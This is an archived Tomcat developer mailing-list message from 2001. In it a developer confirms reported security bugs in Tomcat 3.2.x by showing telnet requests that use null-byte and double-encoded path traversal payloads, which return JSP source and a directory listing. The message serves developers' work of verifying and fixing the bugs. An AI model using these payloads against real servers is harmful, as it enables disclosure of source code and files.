tomcat-dev mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From Stephan Seyboth <...@caldera.de>
Subject Re: TC3.2.x and security problems
Date Wed, 04 Apr 2001 14:08:20 GMT
On Wed, Apr 04, 2001 at 08:35:11AM -0500, Marc Saegesser wrote:
> Has anyone on tomcat-dev been able to reproduce these problems using Tomcat
> 3.2.x?  I've been trying to reproduce the error using 3.2.1, 3.2.2b2 and
> even 3.1.1.  So far I always get a 404.  I've never been able to get
> directory listing or JSP source.

[...]

> > > exploits:
> > > http://target:8080/%2e%2e/%2e%2e/%00.jsp
> > > It is possible to cause the Tomcat server to Listing
> > > outside the document root directory scope.

I can't reproduce that one, but could verify the following problems
on Linux:

$ telnet localhost 8080
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
GET /examples/jsp/num/numguess.jsp
HTTP/1.0 200 OK
Content-Type: text/plain
Content-Length: 1237
Last-Modified: Tue, 03 Apr 2001 14:49:28 GMT
Servlet-Engine: Tomcat Web Server/3.2.1 (JSP 1.1; Servlet 2.2; Java 1.3.0;
Linux 2.4.2 i386; java.vendor=Caldera Systems Inc.)
 
[numguess.jsp source follows]
 
$ telnet localhost 8180
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
GET /examples/jsp/num/numguess.jsp%00
HTTP/1.0 200 OK
Content-Type: text/plain
Content-Length: 1237
Last-Modified: Wed, 04 Apr 2001 10:37:30 GMT
Servlet-Engine: Tomcat Web Server/3.2.2 beta 2 (JSP 1.1; Servlet 2.2;
Java 1.3.0; Linux 2.4.2 i386; java.vendor=Caldera Systems Inc.)
 
[numguess.jsp source follows]

$ telnet localhost 8180
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
GET /%252e%252e/%252e%252e/%00.jsp
 
HTTP/1.0 200 OK
Content-Type: text/html;charset=ISO-8859-1
Servlet-Engine: Tomcat Web Server/3.2.2 beta 2 (JSP 1.1; Servlet 2.2;
Java 1.3.0; Linux 2.4.2 i386; java.vendor=Caldera Systems Inc.)

[directory listing follows]

-- 
Stephan Seyboth - Developer
Caldera (Deutschland) GmbH
http://www.caldera.de/

Mime
View raw message